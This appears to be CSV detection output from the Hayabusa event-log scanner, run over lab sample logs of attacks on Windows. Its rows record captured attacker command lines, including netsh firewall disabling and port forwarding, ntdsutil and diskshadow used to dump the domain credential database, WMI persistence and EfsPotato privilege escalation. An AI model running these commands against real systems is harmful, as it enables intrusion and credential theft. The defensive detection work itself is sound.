+2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
+2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
+2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: WADGUtilityAccount | SID: S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
+2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: elie | SID: S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
+2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
+2021-06-03 21:17:58.582 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh I p a v l=8001 listena=0.0.0.0 connectp=3389 c=1.1.1.1 | Path: C:\Windows\System32\netsh.exe | PID: 0x578 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
+2021-06-03 21:18:04.312 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=80 | Path: C:\Windows\System32\netsh.exe | PID: 0x1048 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
+2021-06-03 21:18:06.940 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy reset | Path: C:\Windows\System32\netsh.exe | PID: 0x46c | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
+2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
+2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
+2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Evas,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
+2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
+2021-06-04 04:17:46.489 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a s p state off | Path: C:\Windows\System32\netsh.exe | PID: 0xfa8 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
+2021-06-04 04:17:46.577 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall set privateprofile state off | Path: C:\Windows\System32\netsh.exe | PID: 0x10fc | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
+2021-06-04 04:17:46.666 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh f s o d | Path: C:\Windows\System32\netsh.exe | PID: 0x1598 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
+2021-06-04 04:17:47.699 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh firewall set opmode disable | Path: C:\Windows\System32\netsh.exe | PID: 0x1504 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
+2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
+2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
+2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
+2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
+2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
+2021-06-04 18:30:48.170 +09:00,exchange01.offsec.lan,11,info,,File Created,Path: E:\Exchange2016\TransportRoles\Shared\agents.config | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 19108 | PGUID: 6D3C60FE-F13D-60B9-22E2-010000001D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID11-Exchange transport config modified.evtx
+2021-06-06 04:35:16.721 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\hacker' q q | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x724 | User: admmig | LID: 0xa8a1627a,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx
+2021-06-06 04:36:32.683 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ntdsutil ""activate instance ntds"" ifm ""create full c:\hacker"" quit quit | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x1bec | User: admmig | LID: 0xa8a1627a",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx
+2021-06-06 05:17:05.433 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: diskshadow.exe /s shadow.txt | Path: C:\Windows\System32\diskshadow.exe | PID: 0xda8 | User: admmig | LID: 0xa8a1627a,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Diskshadow abuse.evtx
+2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,medium,,WMI Event Consumer Activity,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Type: Command Line | Name: ""Evil"" | Dst: ""cmd.exe /c echo %ProcessId% >> c:\\\\temp\\\\log.txt"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/20_WmiEventConsumerActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
+2021-06-10 04:29:58.240 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
+2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
+2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.390 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /C whoami > C:\Windows\Temp\bouWFQYO.tmp 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x3d0 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx
+2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
+2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
+2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
+2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,info,Evas | Persis,Bits Job Created,Job Title: test | URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx
+2021-08-08 08:32:57.348 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"" /n ""C:\Users\IEUser\Desktop\stats.doc"" | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 3424 | PGUID: 747F3D96-1829-610F-0000-0010A33FD200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | Process: C:\Windows\SysWOW64\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 9932 | PGUID: 747F3D96-182D-610F-0000-00106F40D300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 11196 | PGUID: 747F3D96-182D-610F-0000-00100344D300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" c:\users\public\memViewData.jpg,PluginInit | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | LID: 0x7a857 | PID: 6576 | PGUID: 747F3D96-1834-610F-0000-00105FE5D300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x7a857 | PID: 11324 | PGUID: 747F3D96-183B-610F-0000-0010DC6CD400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
+2021-08-17 21:26:51.403 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.457 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: c:\temp\EfsPotato.exe whoami | Process: C:\temp\EfsPotato.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,info,,Pipe Created,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: c:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.881 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\temp\EfsPotato.exe whoami | LID: 0x3e7 | PID: 11328 | PGUID: 00247C92-A692-6122-0000-0010A5CD1F02,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
